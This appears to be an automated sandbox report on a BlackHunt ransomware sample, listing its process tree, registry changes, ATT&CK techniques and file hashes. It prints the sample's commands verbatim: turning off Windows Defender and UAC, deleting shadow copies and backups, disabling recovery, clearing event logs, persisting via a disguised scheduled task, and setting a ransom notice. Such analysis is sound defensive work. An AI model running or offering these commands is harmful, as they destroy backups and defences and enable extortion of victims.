0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe 32 PID 2936 wrote to memory of 2468 2936 cmd.exe 133 PID 2936 wrote to memory of 2468 2936 cmd.exe 133 PID 2936 wrote to memory of 2468 2936 cmd.exe 133 PID 2600 wrote to memory of 2464 2600 cmd.exe 132 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe"C:\Users\Admin\AppData\Local\Temp\0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1848 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2524
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:3052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2112
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1920
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2804
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1900
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:652
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1020
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1112
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1556
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe" /F2⤵PID:1720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3068
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2956
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:548
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2696
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3064
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1744
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2636
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2492
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1928
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2584
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2680
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:4432
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:4416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:4132
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:4840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4612
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4656
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:4816
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2544
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe"2⤵
- Deletes itself
PID:3220 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:4444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:5012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2104
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:4968
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:4964
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2332
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1968
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4264
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4500
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:4484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:4540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:4528
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:4412
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:384
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1916
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Modifies registry class
PID:2608
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:1632
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\0894059b57f48d9eb998f77788d357a9d542df2b012caa43fab5aa0fd949f0a6.exe" /F1⤵
- Creates scheduled task(s)
PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:2472
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:2652
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:1280
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:1856
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2468
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:2252
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1588
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2500
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2088
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:1988
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:896
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:328
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1228
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:2556
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:2996
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:2072
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1240
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:1548
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2812
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2172
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2464
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2508
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2676
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:2500
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2768
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:4972
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:3320
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:5116
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:4884
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"1⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4144
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:2724
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:3376
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3176
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:3972
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:652
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:3524
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:328
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "524120401578689774-106727414615216420942106315951598837389-16359627141427464408"1⤵
- Enumerates connected drives
PID:2560
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "109495274-5972116578394105-32428127-1421059695662927531-619860194160638970"1⤵PID:1556
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e0b4b94f26224a7b5290fd211b760961
SHA1c3f17910ffcb13da9008381d89f7bcee52a9a9ad
SHA2561962cc3ef81173640d8b6b4be77264ecc92f7d75859df81791a1ea5409c3f27c
SHA512749bec7aad7bd8c76245afa55a793d3e1287beaab45f43e5e483ff7f1bb049b8b1f34495c0f0782ecb0e45badf09462ed2625a13660c109fa28c2ad425fa8590
-
Filesize
12KB
MD50f8d03e3a5b9aa99ee631dfece168074
SHA1e08e054f17302aba5186b5e59a09e204bb1df034
SHA2561898d4e6c1fa99d50b9741492a6c8a5292f3b0012f3ece8a2eff6c4d77a05dbf
SHA5129b38630b646ccd97c61f9b59d006ce38a4849343bef1998316ac1e460bb46e56a3f87cb68207fd814c87fbe7993a4b5e1d9848c61d836146ef3151031dd7ef5a
-
Filesize
684B
MD5319fe3d9f6843d9707c96eab847c9567
SHA15c9a6050baf03c86ca6c1e5fa4ae63d5dfe0e38f
SHA25669c13162e89a37a8695dd9a02986241500b50ab421a074451a03ea6ddb9a7b3a
SHA5124390d7e36dbeb7ee63f883effd453168d0a1c50c9b372a49a3c1a930bdf915c46b300bf7db8c1e104d27e72aaa9446be03bb5e444f6096557a1117ce26217a9d